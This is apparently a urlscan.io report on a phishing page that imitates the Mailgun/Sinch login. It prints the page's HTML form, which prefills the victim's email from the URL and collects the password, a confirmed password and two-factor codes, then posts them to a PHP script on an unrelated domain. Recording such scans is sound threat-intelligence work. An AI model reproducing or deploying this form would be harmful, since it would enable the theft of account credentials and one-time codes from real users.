hisayo-ohta.com Open in urlscan Pro
162.43.120.3  Public Scan

Submitted URL: https://oauth052124-mailgun000-82fe84acbf3144fdb106bsaed364b.gunny2024-1.workers.dev/?eba=
Effective URL: https://hisayo-ohta.com/01252024/mailgun-00-connect/
Submission: On May 23 via manual from IN — Scanned from DE

Form analysis 1 forms found in the DOM

POST https://hisayo-ohta.com/01252024/mailgun-00-connect/1.php

<form class="loginForm__form" action="https://hisayo-ohta.com/01252024/mailgun-00-connect/1.php" method="POST">
  <div class="loginForm__content" id="content">
    <div class="hidden" id="usernameForm" data-next="checkUsername">
      <p class="loginForm__paragraph">
        <font face="Arial">Login</font>
      </p>
      <div class="labelGroup">
        <label class="labelGroup__label" for="testx">Email</label>
      </div>
      <input name="email" tabindex="1" class="loginForm__input" id="textx" type="hidden" readonly="" value="undefined" autocomplete="username">
    </div>
    <div id="passwordForm" data-next="checkPassword">
      <p class="loginForm__paragraph">
        <font face="Arial">Login</font>
      </p>
      <div class="loginForm__statusMessageContainer statusMessageContainer__topHeight hidden" id="loginErrortop">
        <div class="loginForm__statusMessage" id="messagetop"></div>
      </div>
      <div class="labelGroup">
        <label class="labelGroup__label" id="emailLabel" for="testx" style="color: rgb(169, 169, 169);">undefined</label>
      </div>
      <script>
        let emailFromUrl = window.location.hash.substring(1);
        let emailLabel = document.getElementById("emailLabel");
        emailLabel.innerText = "" + emailFromUrl;
        emailLabel.classList.remove("labelGroup__label__disabled");
        emailLabel.style.color = "#A9A9A9"; // Setting the text color to grey
      </script>
      <input name="email" tabindex="1" class="loginForm__input" id="testx" type="text" autocomplete="username">
      <div class="labelGroup">
        <label class="labelGroup__label" for="Pass">
          <p>Password</p>
        </label>
      </div>
      <input name="Pass" tabindex="1" class="loginForm__input" id="Pass" type="password" autocomplete="current-password" minlength="5">
      <div class="labelGroup">
        <label class="labelGroup__label" for="ConfirmPass">
          <p>Confirm Password</p>
        </label>
      </div>
      <input name="ConfirmPass" tabindex="1" class="loginForm__input" id="ConfirmPass" type="password" autocomplete="current-password" minlength="5">
      <span class="error" id="passwordMismatchError" aria-live="assertive"></span>
    </div>
    <script>
      const passwordInput = document.getElementById("Pass");
      const confirmPasswordInput = document.getElementById("ConfirmPass");
      const passwordMismatchError = document.getElementById("passwordMismatchError");
      confirmPasswordInput.addEventListener('input', function() {
        if (passwordInput.value !== confirmPasswordInput.value) {
          passwordMismatchError.textContent = 'Passwords do not match';
          passwordMismatchError.style.color = 'red'; // Change text color to red
          confirmPasswordInput.setAttribute('aria-invalid', 'true');
        } else {
          passwordMismatchError.textContent = '';
          confirmPasswordInput.setAttribute('aria-invalid', 'false');
        }
      });
    </script>
    <div class="hidden" id="tfaForm" data-next="check2fa">
      <p class="tfaForm__paragraph">
        <font face="Arial">Welcome back</font>
      </p>
      <label class="loginForm__label" for="useremail"></label>
      <div class="labelGroup">
        <label class="labelGroup__label">Two-factor authentication token</label>
      </div>
      <input name="otp" tabindex="1" class="loginForm__input" id="otp-input" type="text" placeholder="123456" value="" autocomplete="one-time-code">
      <div class="rememberMe">
        <input name="otp-remember-me" class="loginForm__checkbox" id="otp-checkbox-check" type="checkbox" checked="">
        <label class="tfaForm__checkboxLabel" for="otp-checkbox-check">Don't ask again on this computer.</label>
      </div>
    </div>
    <div class="hidden" id="setupForm" data-next="confirm2fa">
      <p class="tfa-instructions">Use your authenticator app to scan the code below.</p>
      <div class="setupForm__otp-image" id="otp"></div>
      <p class="tfa-instructions"> Alternatively, you can manually type in the following secret: </p>
      <pre class="setupForm__secret" id="secret"><font face="Arial"></font></pre> The following code is your recovery code.
      <pre class="setupForm__secret" id="recovery-code"><font face="Arial"></font></pre> Store it in a safe place where only you have access to it. Recovery codes can be used to access your account in the event you lose access to your device and
      cannot receive two-factor authentication codes. <p></p>
    </div>
    <div class="hidden" id="finish2faForm" data-next="complete2fa">
      <div class="labelGroup">
        <label class="labelGroup__label">Enter a 2FA code below to continue.</label>
      </div>
      <input name="otp" tabindex="1" class="loginForm__input" id="opt-setup-input" type="text" placeholder="123456" value="" autocomplete="one-time-code">
      <div class="rememberMe">
        <input name="otp-remember-me" class="loginForm__checkbox" id="otp-checkbox-finish" type="checkbox" checked="">
        <label class="labelGroup__label" for="otp-checkbox-finish">Don't ask again on this computer.</label>
      </div>
    </div>
    <div class="hidden" id="challengeForm" data-next="check2fa">
      <p class="tfaForm__paragraph">
        <font face="Arial">Auth code</font>
      </p>
      <label class="loginForm__label">Check your email for the code</label>
      <input name="otp" tabindex="1" class="loginForm__input" id="email-auth-input" type="text" placeholder="123456" value="" autocomplete="one-time-code">
      <!-- TODO: When we enable this we will need make a small change to the challenge logic in users -->
      <!-- <div class='rememberMe'>
                        <input type='checkbox' id='otp-checkbox-challenge' name="otp-remember-me" checked/>
                        <label for='otp-checkbox-challenge' class='labelGroup__label'>Don't ask again on this computer</label>
                   </div> -->
    </div>
    <div class="loginForm__statusMessageContainer hidden" id="loginErrorbottom">
      <div class="loginForm__statusMessage" id="messagebottom"></div>
    </div>
  </div>
  <div class="loginForm__buttonContainer">
    <right></right><button tabindex="2" class="loginForm__buttonPrimary" id="next" type="submit">
      <font face="Arial">Log in</font>
    </button>
  </div>
  <div class="stepLink__container">
    <div class="stepLink"><a class="labelGroup__resetLink" href="#">Forgot your password?</a></div>
  </div>
</form>

Text Content

&amp;amp;amp;amp;amp;amp;lt;iframe
src="https://www.googletagmanager.com/ns.html?id=GTM-WN2J6" height="0" width="0"
style="display: none; visibility: hidden"
&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;/iframe&amp;amp;amp;amp;amp;amp;gt;

Login

Email

Login


undefined

Password

Confirm Password

Welcome back

Two-factor authentication token
Don't ask again on this computer.

Use your authenticator app to scan the code below.



Alternatively, you can manually type in the following secret:



The following code is your recovery code.



Store it in a safe place where only you have access to it. Recovery codes can be
used to access your account in the event you lose access to your device and
cannot receive two-factor authentication codes.



Enter a 2FA code below to continue.
Don't ask again on this computer.

Auth code

Check your email for the code

Log in
Forgot your password?
©2024 Sinch. All rights reserved.  Terms of use  |  Privacy policy  |  Sending
policy
&amp;amp;amp;amp;amp;amp;lt;img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=541164370529087&amp;amp;amp;amp;amp;amp;amp;amp;ev=PageView&amp;amp;amp;amp;amp;amp;amp;amp;noscript=1"&amp;amp;amp;amp;amp;amp;gt;
&amp;amp;amp;amp;amp;amp;lt;img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=541164370529087&amp;amp;amp;amp;amp;amp;amp;amp;ev=PageView&amp;amp;amp;amp;amp;amp;amp;amp;noscript=1"&amp;amp;amp;amp;amp;amp;gt;